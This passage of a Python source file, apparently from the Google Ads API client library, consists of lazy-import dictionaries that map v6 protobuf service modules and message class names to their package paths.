"google.ads.google_ads.v6.proto.services", "dynamic_search_ads_search_term_view_service_pb2": "google.ads.google_ads.v6.proto.services", "expanded_landing_page_view_service_pb2": "google.ads.google_ads.v6.proto.services", "extension_feed_item_service_pb2": "google.ads.google_ads.v6.proto.services", "feed_item_service_pb2": "google.ads.google_ads.v6.proto.services", "feed_item_set_link_service_pb2": "google.ads.google_ads.v6.proto.services", "feed_item_set_service_pb2": "google.ads.google_ads.v6.proto.services", "feed_item_target_service_pb2": "google.ads.google_ads.v6.proto.services", "feed_mapping_service_pb2": "google.ads.google_ads.v6.proto.services", "feed_placeholder_view_service_pb2": "google.ads.google_ads.v6.proto.services", "feed_service_pb2": "google.ads.google_ads.v6.proto.services", "gender_view_service_pb2": "google.ads.google_ads.v6.proto.services", "geo_target_constant_service_pb2": "google.ads.google_ads.v6.proto.services", "geographic_view_service_pb2": "google.ads.google_ads.v6.proto.services", "google_ads_field_service_pb2": "google.ads.google_ads.v6.proto.services", "google_ads_service_pb2": "google.ads.google_ads.v6.proto.services", "group_placement_view_service_pb2": "google.ads.google_ads.v6.proto.services", "hotel_group_view_service_pb2": "google.ads.google_ads.v6.proto.services", "hotel_performance_view_service_pb2": "google.ads.google_ads.v6.proto.services", "income_range_view_service_pb2": "google.ads.google_ads.v6.proto.services", "invoice_service_pb2": "google.ads.google_ads.v6.proto.services", "keyword_plan_ad_group_keyword_service_pb2": "google.ads.google_ads.v6.proto.services", "keyword_plan_ad_group_service_pb2": "google.ads.google_ads.v6.proto.services", "keyword_plan_campaign_keyword_service_pb2": "google.ads.google_ads.v6.proto.services", "keyword_plan_campaign_service_pb2": "google.ads.google_ads.v6.proto.services", "keyword_plan_idea_service_pb2": "google.ads.google_ads.v6.proto.services", "keyword_plan_service_pb2": "google.ads.google_ads.v6.proto.services", "keyword_view_service_pb2": "google.ads.google_ads.v6.proto.services", "label_service_pb2": "google.ads.google_ads.v6.proto.services", "landing_page_view_service_pb2": "google.ads.google_ads.v6.proto.services", "language_constant_service_pb2": "google.ads.google_ads.v6.proto.services", "location_view_service_pb2": "google.ads.google_ads.v6.proto.services", "managed_placement_view_service_pb2": "google.ads.google_ads.v6.proto.services", "media_file_service_pb2": "google.ads.google_ads.v6.proto.services", "merchant_center_link_service_pb2": "google.ads.google_ads.v6.proto.services", "mobile_app_category_constant_service_pb2": "google.ads.google_ads.v6.proto.services", "mobile_device_constant_service_pb2": "google.ads.google_ads.v6.proto.services", "offline_user_data_job_service_pb2": "google.ads.google_ads.v6.proto.services", "operating_system_version_constant_service_pb2": "google.ads.google_ads.v6.proto.services", "paid_organic_search_term_view_service_pb2": "google.ads.google_ads.v6.proto.services", "parental_status_view_service_pb2": "google.ads.google_ads.v6.proto.services", "payments_account_service_pb2": "google.ads.google_ads.v6.proto.services", "product_bidding_category_constant_service_pb2": "google.ads.google_ads.v6.proto.services", "product_group_view_service_pb2": "google.ads.google_ads.v6.proto.services", "reach_plan_service_pb2": "google.ads.google_ads.v6.proto.services", "recommendation_service_pb2": "google.ads.google_ads.v6.proto.services", "remarketing_action_service_pb2": "google.ads.google_ads.v6.proto.services", "search_term_view_service_pb2": "google.ads.google_ads.v6.proto.services", "shared_criterion_service_pb2": "google.ads.google_ads.v6.proto.services", "shared_set_service_pb2": "google.ads.google_ads.v6.proto.services", "shopping_performance_view_service_pb2": "google.ads.google_ads.v6.proto.services", "third_party_app_analytics_link_service_pb2": "google.ads.google_ads.v6.proto.services", "topic_constant_service_pb2": "google.ads.google_ads.v6.proto.services", "topic_view_service_pb2": "google.ads.google_ads.v6.proto.services", "user_data_service_pb2": "google.ads.google_ads.v6.proto.services", "user_interest_service_pb2": "google.ads.google_ads.v6.proto.services", "user_list_service_pb2": "google.ads.google_ads.v6.proto.services", "user_location_view_service_pb2": "google.ads.google_ads.v6.proto.services", "video_service_pb2": "google.ads.google_ads.v6.proto.services", "operations_pb2": "google.longrunning", "any_pb2": "google.protobuf", "empty_pb2": "google.protobuf", "field_mask_pb2": "google.protobuf", "wrappers_pb2": "google.protobuf", "status_pb2": "google.rpc", } _lazy_class_to_package_map = { "AccessInvitationErrorEnum": "google.ads.google_ads.v6.proto.errors.access_invitation_error_pb2", "AccessInvitationStatusEnum": "google.ads.google_ads.v6.proto.enums.access_invitation_status_pb2", "AccessReasonEnum": "google.ads.google_ads.v6.proto.enums.access_reason_pb2", "AccessRoleEnum": "google.ads.google_ads.v6.proto.enums.access_role_pb2", "AccountBudget": "google.ads.google_ads.v6.proto.resources.account_budget_pb2", "AccountBudgetProposal": "google.ads.google_ads.v6.proto.resources.account_budget_proposal_pb2", "AccountBudgetProposalErrorEnum": "google.ads.google_ads.v6.proto.errors.account_budget_proposal_error_pb2", "AccountBudgetProposalOperation": "google.ads.google_ads.v6.proto.services.account_budget_proposal_service_pb2", "AccountBudgetProposalStatusEnum": "google.ads.google_ads.v6.proto.enums.account_budget_proposal_status_pb2", "AccountBudgetProposalTypeEnum": "google.ads.google_ads.v6.proto.enums.account_budget_proposal_type_pb2", "AccountBudgetStatusEnum": "google.ads.google_ads.v6.proto.enums.account_budget_status_pb2", "AccountLink": "google.ads.google_ads.v6.proto.resources.account_link_pb2", "AccountLinkErrorEnum": "google.ads.google_ads.v6.proto.errors.account_link_error_pb2", "AccountLinkOperation": "google.ads.google_ads.v6.proto.services.account_link_service_pb2", "AccountLinkStatusEnum": "google.ads.google_ads.v6.proto.enums.account_link_status_pb2", "Ad": "google.ads.google_ads.v6.proto.resources.ad_pb2", "AdAssetPolicySummary": "google.ads.google_ads.v6.proto.common.asset_policy_pb2", "AdCustomizerErrorEnum": "google.ads.google_ads.v6.proto.errors.ad_customizer_error_pb2", "AdCustomizerPlaceholderFieldEnum": "google.ads.google_ads.v6.proto.enums.ad_customizer_placeholder_field_pb2", "AdDestinationTypeEnum": "google.ads.google_ads.v6.proto.enums.ad_destination_type_pb2", "AdErrorEnum": "google.ads.google_ads.v6.proto.errors.ad_error_pb2", "AdGroup": "google.ads.google_ads.v6.proto.resources.ad_group_pb2", "AdGroupAd": "google.ads.google_ads.v6.proto.resources.ad_group_ad_pb2", "AdGroupAdAssetPolicySummary": "google.ads.google_ads.v6.proto.resources.ad_group_ad_asset_view_pb2", "AdGroupAdAssetView": "google.ads.google_ads.v6.proto.resources.ad_group_ad_asset_view_pb2", "AdGroupAdErrorEnum": "google.ads.google_ads.v6.proto.errors.ad_group_ad_error_pb2", "AdGroupAdLabel": "google.ads.google_ads.v6.proto.resources.ad_group_ad_label_pb2", "AdGroupAdLabelOperation": "google.ads.google_ads.v6.proto.services.ad_group_ad_label_service_pb2", "AdGroupAdOperation": "google.ads.google_ads.v6.proto.services.ad_group_ad_service_pb2", "AdGroupAdPolicySummary": "google.ads.google_ads.v6.proto.resources.ad_group_ad_pb2", "AdGroupAdRotationModeEnum": "google.ads.google_ads.v6.proto.enums.ad_group_ad_rotation_mode_pb2", "AdGroupAdStatusEnum": "google.ads.google_ads.v6.proto.enums.ad_group_ad_status_pb2", "AdGroupAudienceView": "google.ads.google_ads.v6.proto.resources.ad_group_audience_view_pb2", "AdGroupBidModifier": "google.ads.google_ads.v6.proto.resources.ad_group_bid_modifier_pb2", "AdGroupBidModifierErrorEnum": "google.ads.google_ads.v6.proto.errors.ad_group_bid_modifier_error_pb2", "AdGroupBidModifierOperation": "google.ads.google_ads.v6.proto.services.ad_group_bid_modifier_service_pb2", "AdGroupCriterion": "google.ads.google_ads.v6.proto.resources.ad_group_criterion_pb2", "AdGroupCriterionApprovalStatusEnum": "google.ads.google_ads.v6.proto.enums.ad_group_criterion_approval_status_pb2", "AdGroupCriterionErrorEnum": "google.ads.google_ads.v6.proto.errors.ad_group_criterion_error_pb2", "AdGroupCriterionLabel": "google.ads.google_ads.v6.proto.resources.ad_group_criterion_label_pb2", "AdGroupCriterionLabelOperation": "google.ads.google_ads.v6.proto.services.ad_group_criterion_label_service_pb2", "AdGroupCriterionOperation": "google.ads.google_ads.v6.proto.services.ad_group_criterion_service_pb2", "AdGroupCriterionSimulation": "google.ads.google_ads.v6.proto.resources.ad_group_criterion_simulation_pb2", "AdGroupCriterionStatusEnum": "google.ads.google_ads.v6.proto.enums.ad_group_criterion_status_pb2", "AdGroupErrorEnum": "google.ads.google_ads.v6.proto.errors.ad_group_error_pb2", "AdGroupExtensionSetting": "google.ads.google_ads.v6.proto.resources.ad_group_extension_setting_pb2", "AdGroupExtensionSettingOperation": "google.ads.google_ads.v6.proto.services.ad_group_extension_setting_service_pb2", "AdGroupFeed": "google.ads.google_ads.v6.proto.resources.ad_group_feed_pb2", "AdGroupFeedErrorEnum": "google.ads.google_ads.v6.proto.errors.ad_group_feed_error_pb2", "AdGroupFeedOperation": "google.ads.google_ads.v6.proto.services.ad_group_feed_service_pb2", "AdGroupLabel": "google.ads.google_ads.v6.proto.resources.ad_group_label_pb2", "AdGroupLabelOperation": "google.ads.google_ads.v6.proto.services.ad_group_label_service_pb2", "AdGroupOperation": "google.ads.google_ads.v6.proto.services.ad_group_service_pb2", "AdGroupSimulation": "google.ads.google_ads.v6.proto.resources.ad_group_simulation_pb2", "AdGroupStatusEnum": "google.ads.google_ads.v6.proto.enums.ad_group_status_pb2", "AdGroupTypeEnum": "google.ads.google_ads.v6.proto.enums.ad_group_type_pb2", "AdImageAsset": "google.ads.google_ads.v6.proto.common.ad_asset_pb2", "AdMediaBundleAsset": "google.ads.google_ads.v6.proto.common.ad_asset_pb2", "AdNetworkTypeEnum": "google.ads.google_ads.v6.proto.enums.ad_network_type_pb2", "AdOperation": "google.ads.google_ads.v6.proto.services.ad_service_pb2", "AdParameter": "google.ads.google_ads.v6.proto.resources.ad_parameter_pb2", "AdParameterErrorEnum": "google.ads.google_ads.v6.proto.errors.ad_parameter_error_pb2", "AdParameterOperation": "google.ads.google_ads.v6.proto.services.ad_parameter_service_pb2", "AdScheduleInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "AdScheduleView": "google.ads.google_ads.v6.proto.resources.ad_schedule_view_pb2", "AdServingOptimizationStatusEnum": "google.ads.google_ads.v6.proto.enums.ad_serving_optimization_status_pb2", "AdSharingErrorEnum": "google.ads.google_ads.v6.proto.errors.ad_sharing_error_pb2", "AdStrengthEnum": "google.ads.google_ads.v6.proto.enums.ad_strength_pb2", "AdTextAsset": "google.ads.google_ads.v6.proto.common.ad_asset_pb2", "AdTypeEnum": "google.ads.google_ads.v6.proto.enums.ad_type_pb2", "AdVideoAsset": "google.ads.google_ads.v6.proto.common.ad_asset_pb2", "AddBatchJobOperationsRequest": "google.ads.google_ads.v6.proto.services.batch_job_service_pb2", "AddBatchJobOperationsResponse": "google.ads.google_ads.v6.proto.services.batch_job_service_pb2", "AddOfflineUserDataJobOperationsRequest": "google.ads.google_ads.v6.proto.services.offline_user_data_job_service_pb2", "AddOfflineUserDataJobOperationsResponse": "google.ads.google_ads.v6.proto.services.offline_user_data_job_service_pb2", "AddressInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "AdvertisingChannelSubTypeEnum": "google.ads.google_ads.v6.proto.enums.advertising_channel_sub_type_pb2", "AdvertisingChannelTypeEnum": "google.ads.google_ads.v6.proto.enums.advertising_channel_type_pb2", "AdxErrorEnum": "google.ads.google_ads.v6.proto.errors.adx_error_pb2", "AffiliateLocationFeedItem": "google.ads.google_ads.v6.proto.common.extensions_pb2", "AffiliateLocationFeedRelationshipTypeEnum": "google.ads.google_ads.v6.proto.enums.affiliate_location_feed_relationship_type_pb2", "AffiliateLocationPlaceholderFieldEnum": "google.ads.google_ads.v6.proto.enums.affiliate_location_placeholder_field_pb2", "AgeRangeInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "AgeRangeTypeEnum": "google.ads.google_ads.v6.proto.enums.age_range_type_pb2", "AgeRangeView": "google.ads.google_ads.v6.proto.resources.age_range_view_pb2", "AppAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "AppCampaignAppStoreEnum": "google.ads.google_ads.v6.proto.enums.app_campaign_app_store_pb2", "AppCampaignBiddingStrategyGoalTypeEnum": "google.ads.google_ads.v6.proto.enums.app_campaign_bidding_strategy_goal_type_pb2", "AppEngagementAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "AppFeedItem": "google.ads.google_ads.v6.proto.common.extensions_pb2", "AppPaymentModelInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "AppPaymentModelTypeEnum": "google.ads.google_ads.v6.proto.enums.app_payment_model_type_pb2", "AppPlaceholderFieldEnum": "google.ads.google_ads.v6.proto.enums.app_placeholder_field_pb2", "AppStoreEnum": "google.ads.google_ads.v6.proto.enums.app_store_pb2", "AppUrlOperatingSystemTypeEnum": "google.ads.google_ads.v6.proto.enums.app_url_operating_system_type_pb2", "ApplyRecommendationOperation": "google.ads.google_ads.v6.proto.services.recommendation_service_pb2", "ApplyRecommendationRequest": "google.ads.google_ads.v6.proto.services.recommendation_service_pb2", "ApplyRecommendationResponse": "google.ads.google_ads.v6.proto.services.recommendation_service_pb2", "ApplyRecommendationResult": "google.ads.google_ads.v6.proto.services.recommendation_service_pb2", "Asset": "google.ads.google_ads.v6.proto.resources.asset_pb2", "AssetErrorEnum": "google.ads.google_ads.v6.proto.errors.asset_error_pb2", "AssetFieldTypeEnum": "google.ads.google_ads.v6.proto.enums.asset_field_type_pb2", "AssetLinkErrorEnum": "google.ads.google_ads.v6.proto.errors.asset_link_error_pb2", "AssetLinkStatusEnum": "google.ads.google_ads.v6.proto.enums.asset_link_status_pb2", "AssetOperation": "google.ads.google_ads.v6.proto.services.asset_service_pb2", "AssetPerformanceLabelEnum": "google.ads.google_ads.v6.proto.enums.asset_performance_label_pb2", "AssetPolicySummary": "google.ads.google_ads.v6.proto.resources.asset_pb2", "AssetTypeEnum": "google.ads.google_ads.v6.proto.enums.asset_type_pb2", "AttributeFieldMapping": "google.ads.google_ads.v6.proto.resources.feed_mapping_pb2", "AttributionModelEnum": "google.ads.google_ads.v6.proto.enums.attribution_model_pb2", "AuthenticationErrorEnum": "google.ads.google_ads.v6.proto.errors.authentication_error_pb2", "AuthorizationErrorEnum": "google.ads.google_ads.v6.proto.errors.authorization_error_pb2", "BasicUserListInfo": "google.ads.google_ads.v6.proto.common.user_lists_pb2", "BatchJob": "google.ads.google_ads.v6.proto.resources.batch_job_pb2", "BatchJobErrorEnum": "google.ads.google_ads.v6.proto.errors.batch_job_error_pb2", "BatchJobOperation": "google.ads.google_ads.v6.proto.services.batch_job_service_pb2", "BatchJobResult": "google.ads.google_ads.v6.proto.services.batch_job_service_pb2", "BatchJobStatusEnum": "google.ads.google_ads.v6.proto.enums.batch_job_status_pb2", "BidModifierSimulationPoint": "google.ads.google_ads.v6.proto.common.simulation_pb2", "BidModifierSimulationPointList": "google.ads.google_ads.v6.proto.common.simulation_pb2", "BidModifierSourceEnum": "google.ads.google_ads.v6.proto.enums.bid_modifier_source_pb2", "BiddingErrorEnum": "google.ads.google_ads.v6.proto.errors.bidding_error_pb2", "BiddingSourceEnum": "google.ads.google_ads.v6.proto.enums.bidding_source_pb2", "BiddingStrategy": "google.ads.google_ads.v6.proto.resources.bidding_strategy_pb2", "BiddingStrategyErrorEnum": "google.ads.google_ads.v6.proto.errors.bidding_strategy_error_pb2", "BiddingStrategyOperation": "google.ads.google_ads.v6.proto.services.bidding_strategy_service_pb2", "BiddingStrategyStatusEnum": "google.ads.google_ads.v6.proto.enums.bidding_strategy_status_pb2", "BiddingStrategyTypeEnum": "google.ads.google_ads.v6.proto.enums.bidding_strategy_type_pb2", "BillingSetup": "google.ads.google_ads.v6.proto.resources.billing_setup_pb2", "BillingSetupErrorEnum": "google.ads.google_ads.v6.proto.errors.billing_setup_error_pb2", "BillingSetupOperation": "google.ads.google_ads.v6.proto.services.billing_setup_service_pb2", "BillingSetupStatusEnum": "google.ads.google_ads.v6.proto.enums.billing_setup_status_pb2", "BookOnGoogleAsset": "google.ads.google_ads.v6.proto.common.asset_types_pb2", "BrandSafetySuitabilityEnum": "google.ads.google_ads.v6.proto.enums.brand_safety_suitability_pb2", "BudgetCampaignAssociationStatus": "google.ads.google_ads.v6.proto.common.segments_pb2", "BudgetCampaignAssociationStatusEnum": "google.ads.google_ads.v6.proto.enums.budget_campaign_association_status_pb2", "BudgetDeliveryMethodEnum": "google.ads.google_ads.v6.proto.enums.budget_delivery_method_pb2", "BudgetPeriodEnum": "google.ads.google_ads.v6.proto.enums.budget_period_pb2", "BudgetStatusEnum": "google.ads.google_ads.v6.proto.enums.budget_status_pb2", "BudgetTypeEnum": "google.ads.google_ads.v6.proto.enums.budget_type_pb2", "BusinessNameFilter": "google.ads.google_ads.v6.proto.common.feed_item_set_filter_type_infos_pb2", "CallConversion": "google.ads.google_ads.v6.proto.services.conversion_upload_service_pb2", "CallConversionReportingStateEnum": "google.ads.google_ads.v6.proto.enums.call_conversion_reporting_state_pb2", "CallConversionResult": "google.ads.google_ads.v6.proto.services.conversion_upload_service_pb2", "CallFeedItem": "google.ads.google_ads.v6.proto.common.extensions_pb2", "CallOnlyAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "CallPlaceholderFieldEnum": "google.ads.google_ads.v6.proto.enums.call_placeholder_field_pb2", "CallReportingSetting": "google.ads.google_ads.v6.proto.resources.customer_pb2", "CallTrackingDisplayLocationEnum": "google.ads.google_ads.v6.proto.enums.call_tracking_display_location_pb2", "CallTypeEnum": "google.ads.google_ads.v6.proto.enums.call_type_pb2", "CallView": "google.ads.google_ads.v6.proto.resources.call_view_pb2", "CalloutFeedItem": "google.ads.google_ads.v6.proto.common.extensions_pb2", "CalloutPlaceholderFieldEnum": "google.ads.google_ads.v6.proto.enums.callout_placeholder_field_pb2", "Campaign": "google.ads.google_ads.v6.proto.resources.campaign_pb2", "CampaignAsset": "google.ads.google_ads.v6.proto.resources.campaign_asset_pb2", "CampaignAssetOperation": "google.ads.google_ads.v6.proto.services.campaign_asset_service_pb2", "CampaignAudienceView": "google.ads.google_ads.v6.proto.resources.campaign_audience_view_pb2", "CampaignBidModifier": "google.ads.google_ads.v6.proto.resources.campaign_bid_modifier_pb2", "CampaignBidModifierOperation": "google.ads.google_ads.v6.proto.services.campaign_bid_modifier_service_pb2", "CampaignBudget": "google.ads.google_ads.v6.proto.resources.campaign_budget_pb2", "CampaignBudgetErrorEnum": "google.ads.google_ads.v6.proto.errors.campaign_budget_error_pb2", "CampaignBudgetOperation": "google.ads.google_ads.v6.proto.services.campaign_budget_service_pb2", "CampaignCriterion": "google.ads.google_ads.v6.proto.resources.campaign_criterion_pb2", "CampaignCriterionErrorEnum": "google.ads.google_ads.v6.proto.errors.campaign_criterion_error_pb2", "CampaignCriterionOperation": "google.ads.google_ads.v6.proto.services.campaign_criterion_service_pb2", "CampaignCriterionSimulation": "google.ads.google_ads.v6.proto.resources.campaign_criterion_simulation_pb2", "CampaignCriterionStatusEnum": "google.ads.google_ads.v6.proto.enums.campaign_criterion_status_pb2", "CampaignDraft": "google.ads.google_ads.v6.proto.resources.campaign_draft_pb2", "CampaignDraftErrorEnum": "google.ads.google_ads.v6.proto.errors.campaign_draft_error_pb2", "CampaignDraftOperation": "google.ads.google_ads.v6.proto.services.campaign_draft_service_pb2", "CampaignDraftStatusEnum": "google.ads.google_ads.v6.proto.enums.campaign_draft_status_pb2", "CampaignDuration": "google.ads.google_ads.v6.proto.services.reach_plan_service_pb2", "CampaignErrorEnum": "google.ads.google_ads.v6.proto.errors.campaign_error_pb2", "CampaignExperiment": "google.ads.google_ads.v6.proto.resources.campaign_experiment_pb2", "CampaignExperimentErrorEnum": "google.ads.google_ads.v6.proto.errors.campaign_experiment_error_pb2", "CampaignExperimentOperation": "google.ads.google_ads.v6.proto.services.campaign_experiment_service_pb2", "CampaignExperimentStatusEnum": "google.ads.google_ads.v6.proto.enums.campaign_experiment_status_pb2", "CampaignExperimentTrafficSplitTypeEnum": "google.ads.google_ads.v6.proto.enums.campaign_experiment_traffic_split_type_pb2", "CampaignExperimentTypeEnum": "google.ads.google_ads.v6.proto.enums.campaign_experiment_type_pb2", "CampaignExtensionSetting": "google.ads.google_ads.v6.proto.resources.campaign_extension_setting_pb2", "CampaignExtensionSettingOperation": "google.ads.google_ads.v6.proto.services.campaign_extension_setting_service_pb2", "CampaignFeed": "google.ads.google_ads.v6.proto.resources.campaign_feed_pb2", "CampaignFeedErrorEnum": "google.ads.google_ads.v6.proto.errors.campaign_feed_error_pb2", "CampaignFeedOperation": "google.ads.google_ads.v6.proto.services.campaign_feed_service_pb2", "CampaignLabel": "google.ads.google_ads.v6.proto.resources.campaign_label_pb2", "CampaignLabelOperation": "google.ads.google_ads.v6.proto.services.campaign_label_service_pb2", "CampaignOperation": "google.ads.google_ads.v6.proto.services.campaign_service_pb2", "CampaignServingStatusEnum": "google.ads.google_ads.v6.proto.enums.campaign_serving_status_pb2", "CampaignSharedSet": "google.ads.google_ads.v6.proto.resources.campaign_shared_set_pb2", "CampaignSharedSetErrorEnum": "google.ads.google_ads.v6.proto.errors.campaign_shared_set_error_pb2", "CampaignSharedSetOperation": "google.ads.google_ads.v6.proto.services.campaign_shared_set_service_pb2", "CampaignSharedSetStatusEnum": "google.ads.google_ads.v6.proto.enums.campaign_shared_set_status_pb2", "CampaignStatusEnum": "google.ads.google_ads.v6.proto.enums.campaign_status_pb2", "CarrierConstant": "google.ads.google_ads.v6.proto.resources.carrier_constant_pb2", "CarrierInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "ChangeClientTypeEnum": "google.ads.google_ads.v6.proto.enums.change_client_type_pb2", "ChangeEvent": "google.ads.google_ads.v6.proto.resources.change_event_pb2", "ChangeEventErrorEnum": "google.ads.google_ads.v6.proto.errors.change_event_error_pb2", "ChangeEventResourceTypeEnum": "google.ads.google_ads.v6.proto.enums.change_event_resource_type_pb2", "ChangeStatus": "google.ads.google_ads.v6.proto.resources.change_status_pb2", "ChangeStatusErrorEnum": "google.ads.google_ads.v6.proto.errors.change_status_error_pb2", "ChangeStatusOperationEnum": "google.ads.google_ads.v6.proto.enums.change_status_operation_pb2", "ChangeStatusResourceTypeEnum": "google.ads.google_ads.v6.proto.enums.change_status_resource_type_pb2", "ClickConversion": "google.ads.google_ads.v6.proto.services.conversion_upload_service_pb2", "ClickConversionResult": "google.ads.google_ads.v6.proto.services.conversion_upload_service_pb2", "ClickLocation": "google.ads.google_ads.v6.proto.common.click_location_pb2", "ClickTypeEnum": "google.ads.google_ads.v6.proto.enums.click_type_pb2", "ClickView": "google.ads.google_ads.v6.proto.resources.click_view_pb2", "CollectionSizeErrorEnum": "google.ads.google_ads.v6.proto.errors.collection_size_error_pb2", "CombinedAudience": "google.ads.google_ads.v6.proto.resources.combined_audience_pb2", "CombinedAudienceInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "CombinedAudienceStatusEnum": "google.ads.google_ads.v6.proto.enums.combined_audience_status_pb2", "CombinedRuleUserListInfo": "google.ads.google_ads.v6.proto.common.user_lists_pb2", "Commission": "google.ads.google_ads.v6.proto.common.bidding_pb2", "ContentLabelInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "ContentLabelTypeEnum": "google.ads.google_ads.v6.proto.enums.content_label_type_pb2", "ContextErrorEnum": "google.ads.google_ads.v6.proto.errors.context_error_pb2", "ConversionAction": "google.ads.google_ads.v6.proto.resources.conversion_action_pb2", "ConversionActionCategoryEnum": "google.ads.google_ads.v6.proto.enums.conversion_action_category_pb2", "ConversionActionCountingTypeEnum": "google.ads.google_ads.v6.proto.enums.conversion_action_counting_type_pb2", "ConversionActionErrorEnum": "google.ads.google_ads.v6.proto.errors.conversion_action_error_pb2", "ConversionActionOperation": "google.ads.google_ads.v6.proto.services.conversion_action_service_pb2", "ConversionActionStatusEnum": "google.ads.google_ads.v6.proto.enums.conversion_action_status_pb2", "ConversionActionTypeEnum": "google.ads.google_ads.v6.proto.enums.conversion_action_type_pb2", "ConversionAdjustment": "google.ads.google_ads.v6.proto.services.conversion_adjustment_upload_service_pb2", "ConversionAdjustmentResult": "google.ads.google_ads.v6.proto.services.conversion_adjustment_upload_service_pb2", "ConversionAdjustmentTypeEnum": "google.ads.google_ads.v6.proto.enums.conversion_adjustment_type_pb2", "ConversionAdjustmentUploadErrorEnum": "google.ads.google_ads.v6.proto.errors.conversion_adjustment_upload_error_pb2", "ConversionAttributionEventTypeEnum": "google.ads.google_ads.v6.proto.enums.conversion_attribution_event_type_pb2", "ConversionLagBucketEnum": "google.ads.google_ads.v6.proto.enums.conversion_lag_bucket_pb2", "ConversionOrAdjustmentLagBucketEnum": "google.ads.google_ads.v6.proto.enums.conversion_or_adjustment_lag_bucket_pb2", "ConversionTrackingSetting": "google.ads.google_ads.v6.proto.resources.customer_pb2", "ConversionUploadErrorEnum": "google.ads.google_ads.v6.proto.errors.conversion_upload_error_pb2", "CountryCodeErrorEnum": "google.ads.google_ads.v6.proto.errors.country_code_error_pb2", "CpcBidSimulationPoint": "google.ads.google_ads.v6.proto.common.simulation_pb2", "CpcBidSimulationPointList": "google.ads.google_ads.v6.proto.common.simulation_pb2", "CpvBidSimulationPoint": "google.ads.google_ads.v6.proto.common.simulation_pb2", "CpvBidSimulationPointList": "google.ads.google_ads.v6.proto.common.simulation_pb2", "CreateAccountLinkRequest": "google.ads.google_ads.v6.proto.services.account_link_service_pb2", "CreateAccountLinkResponse": "google.ads.google_ads.v6.proto.services.account_link_service_pb2", "CreateCampaignExperimentMetadata": "google.ads.google_ads.v6.proto.services.campaign_experiment_service_pb2", "CreateCampaignExperimentRequest": "google.ads.google_ads.v6.proto.services.campaign_experiment_service_pb2", "CreateCustomerClientRequest": "google.ads.google_ads.v6.proto.services.customer_service_pb2", "CreateCustomerClientResponse": "google.ads.google_ads.v6.proto.services.customer_service_pb2", "CreateOfflineUserDataJobRequest": "google.ads.google_ads.v6.proto.services.offline_user_data_job_service_pb2", "CreateOfflineUserDataJobResponse": "google.ads.google_ads.v6.proto.services.offline_user_data_job_service_pb2", "CriterionCategoryAvailability": "google.ads.google_ads.v6.proto.common.criterion_category_availability_pb2", "CriterionCategoryChannelAvailability": "google.ads.google_ads.v6.proto.common.criterion_category_availability_pb2", "CriterionCategoryChannelAvailabilityModeEnum": "google.ads.google_ads.v6.proto.enums.criterion_category_channel_availability_mode_pb2", "CriterionCategoryLocaleAvailability": "google.ads.google_ads.v6.proto.common.criterion_category_availability_pb2", "CriterionCategoryLocaleAvailabilityModeEnum": "google.ads.google_ads.v6.proto.enums.criterion_category_locale_availability_mode_pb2", "CriterionErrorEnum": "google.ads.google_ads.v6.proto.errors.criterion_error_pb2", "CriterionSystemServingStatusEnum": "google.ads.google_ads.v6.proto.enums.criterion_system_serving_status_pb2", "CriterionTypeEnum": "google.ads.google_ads.v6.proto.enums.criterion_type_pb2", "CrmBasedUserListInfo": "google.ads.google_ads.v6.proto.common.user_lists_pb2", "CurrencyCodeErrorEnum": "google.ads.google_ads.v6.proto.errors.currency_code_error_pb2", "CurrencyConstant": "google.ads.google_ads.v6.proto.resources.currency_constant_pb2", "CustomAffinityInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "CustomAudience": "google.ads.google_ads.v6.proto.resources.custom_audience_pb2", "CustomAudienceErrorEnum": "google.ads.google_ads.v6.proto.errors.custom_audience_error_pb2", "CustomAudienceInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "CustomAudienceMember": "google.ads.google_ads.v6.proto.resources.custom_audience_pb2", "CustomAudienceMemberTypeEnum": "google.ads.google_ads.v6.proto.enums.custom_audience_member_type_pb2", "CustomAudienceOperation": "google.ads.google_ads.v6.proto.services.custom_audience_service_pb2", "CustomAudienceStatusEnum": "google.ads.google_ads.v6.proto.enums.custom_audience_status_pb2", "CustomAudienceTypeEnum": "google.ads.google_ads.v6.proto.enums.custom_audience_type_pb2", "CustomIntentInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "CustomInterest": "google.ads.google_ads.v6.proto.resources.custom_interest_pb2", "CustomInterestErrorEnum": "google.ads.google_ads.v6.proto.errors.custom_interest_error_pb2", "CustomInterestMember": "google.ads.google_ads.v6.proto.resources.custom_interest_pb2", "CustomInterestMemberTypeEnum": "google.ads.google_ads.v6.proto.enums.custom_interest_member_type_pb2", "CustomInterestOperation": "google.ads.google_ads.v6.proto.services.custom_interest_service_pb2", "CustomInterestStatusEnum": "google.ads.google_ads.v6.proto.enums.custom_interest_status_pb2", "CustomInterestTypeEnum": "google.ads.google_ads.v6.proto.enums.custom_interest_type_pb2", "CustomParameter": "google.ads.google_ads.v6.proto.common.custom_parameter_pb2", "CustomPlaceholderFieldEnum": "google.ads.google_ads.v6.proto.enums.custom_placeholder_field_pb2", "Customer": "google.ads.google_ads.v6.proto.resources.customer_pb2", "CustomerClient": "google.ads.google_ads.v6.proto.resources.customer_client_pb2", "CustomerClientLink": "google.ads.google_ads.v6.proto.resources.customer_client_link_pb2", "CustomerClientLinkErrorEnum": "google.ads.google_ads.v6.proto.errors.customer_client_link_error_pb2", "CustomerClientLinkOperation": "google.ads.google_ads.v6.proto.services.customer_client_link_service_pb2", "CustomerErrorEnum": "google.ads.google_ads.v6.proto.errors.customer_error_pb2", "CustomerExtensionSetting": "google.ads.google_ads.v6.proto.resources.customer_extension_setting_pb2", "CustomerExtensionSettingOperation": "google.ads.google_ads.v6.proto.services.customer_extension_setting_service_pb2", "CustomerFeed": "google.ads.google_ads.v6.proto.resources.customer_feed_pb2", "CustomerFeedErrorEnum": "google.ads.google_ads.v6.proto.errors.customer_feed_error_pb2", "CustomerFeedOperation": "google.ads.google_ads.v6.proto.services.customer_feed_service_pb2", "CustomerLabel": 